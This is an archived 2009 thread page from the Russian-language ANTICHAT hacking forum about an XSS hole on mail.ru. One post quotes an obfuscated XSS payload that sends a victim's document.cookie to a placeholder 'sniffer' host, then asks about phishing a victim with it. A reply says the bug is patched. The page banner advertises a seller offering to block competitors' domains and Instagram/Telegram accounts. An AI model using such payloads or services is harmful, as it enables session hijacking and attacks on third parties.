УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
XSS на mail.ru

Страница 3 из 3

Опции темы

Поиск в этой теме

Опции просмотра

#21

11.05.2009, 10:19

m0Hze

Он хакер.

Регистрация: 01.11.2008

Сообщений: 1,756

Провел на форуме:
6462214

Репутация: 3171

яое, ты круче всех чуваг.

#22

20.05.2009, 16:11

R1k

Познающий

Регистрация: 08.05.2009

Сообщений: 39

Провел на форуме:
32852

Репутация: 20

Отправить сообщение для R1k с помощью ICQ

Цитата:

Сообщение от LemoTTT

Давайте вы мне подробнее раскажете:
Вот код:

PHP код:


		
			
<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:img=new Image();img.src='<img src=http://адрес_сниффера/s.gif?'+escape(document.cookie)+'>';">text</a>

Вопрос № 1:

PHP код:


		
			
&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116

Это зашифрованая ссылка на xss? или что?
Вопрос № 2:
Допустим если я как то найду xss на http://torg.mail.ru/
и потом пришлю вышеуказаную ссылку на почту (тоже мейл ру, а если другая почта?)жертве , она пр кн откроет, и все куки мои?

Баг уже прикрыли))) Можешь не пытаться даже

Страница 3 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss-туннелинг: твой трафик в Xss канале	Mo4x	Чужие Статьи	6	19.07.2007 16:13
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход